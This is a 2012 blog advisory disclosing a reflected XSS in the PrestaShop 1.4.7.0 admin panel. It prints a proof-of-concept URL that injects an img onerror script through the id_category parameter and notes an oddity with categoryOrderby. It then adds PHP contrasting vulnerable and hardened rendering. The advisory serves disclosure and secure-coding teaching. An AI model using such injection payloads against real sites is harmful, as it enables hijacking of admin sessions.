Sunday 18 March 2012

[EN] PrestaShop 1.4.7.0 - XSS-over-GET for/from admin


# TITLE ....... # XSS-over-GET in PrestaShop 1.4.7.0 (for/from admin only) .... #
# DATE ........ # 14.03.2012 ................................................. #
# AUTHOR ...... # http://hauntit.blogspot.com ................................ #
# SOFT LINK ... # http://www.prestashop.com .................................. #
# VERSION ..... # 1.4.7.0 .................................................... #
# TESTED ON ... # LAMP ....................................................... #
# ............................................................................ #

# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...

#............................................#
# 1. What is this?
This is a very nice CMS, you should try it! ;)

#............................................#
# 2. What is the type of vulnerability?

A simple XSS this time, "for the admin user only".

What that means:
To see the vulnerability, go to your admin login page and log in as an admin.
Then type the URL from section 3) into the URL bar.

#............................................#
# 3. Where is bug :)
http://prestashop_1.4.7.0/prestashop/admin12/index.php?tab=AdminCatalog&id_category=");<img src=moc onerror=alert(141012)>&categoryOrderby=name&categoryOrderway=asc&token=token

The vulnerable parameter is id_category.


By the way, there is one more funny thing I found in this webapp too:
when you set the parameter 'categoryOrderby' to '//%e00' (without the quotes), the response will be 200 but the page will be... 'changed' ;]
hf
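As an added illustration of the two findings above (the unescaped id_category reflection and the odd categoryOrderby handling), here is a hypothetical admin-page fragment, not PrestaShop's own code, shown in its vulnerable form next to a hardened one. The function names loadCategory/render_unsafe/render_safe and the allow-listed column names other than 'name' are assumptions; the request values are constructed from the advisory's URL.

```php
<?php
// Added example, not PrestaShop code. The advisory's payload begins with ");
// which indicates id_category is reflected inside a JavaScript string literal.

// Constructed request mirroring the parameters in the advisory's URL.
$request = [
    'id_category'      => '");<img src=moc onerror=alert(141012)>',
    'categoryOrderby'  => '//%e00',
    'categoryOrderway' => 'asc',
];

// Vulnerable pattern: raw query values are written into script and markup,
// so the injected tag closes the string and is rendered by the admin's browser.
function render_unsafe(array $get): string
{
    return '<script>loadCategory("' . $get['id_category'] . '");</script>'
         . '<p>Ordered by ' . $get['categoryOrderby'] . '</p>';
}

// Hardened pattern: enforce the expected type, allow-list option values,
// and encode anything that still has to be reflected as text.
function render_safe(array $get): string
{
    // id_category is a numeric key: accept only a positive integer.
    $id = filter_var($get['id_category'] ?? '', FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        $id = 0; // harmless default instead of echoing the attacker's input
    }

    // Sort column and direction come from fixed allow-lists (assumed names).
    $allowedBy  = ['name', 'id_category', 'position'];
    $allowedWay = ['asc', 'desc'];
    $by  = in_array($get['categoryOrderby'] ?? '', $allowedBy, true)
         ? $get['categoryOrderby'] : 'name';
    $way = in_array($get['categoryOrderway'] ?? '', $allowedWay, true)
         ? $get['categoryOrderway'] : 'asc';

    // json_encode yields a safe JS literal; htmlspecialchars encodes HTML text.
    return '<script>loadCategory(' . json_encode($id) . ');</script>'
         . '<p>Ordered by '
         . htmlspecialchars($by . ' ' . $way, ENT_QUOTES, 'UTF-8') . '</p>';
}

echo render_unsafe($request), "\n";
echo render_safe($request), "\n";
```

The hardened version never echoes the raw id_category or categoryOrderby values, so both the script injection and the '//%e00' oddity are rejected before they reach the page.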
#............................................#
# 4. More...

- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net

#............................................#
# Best regards
#
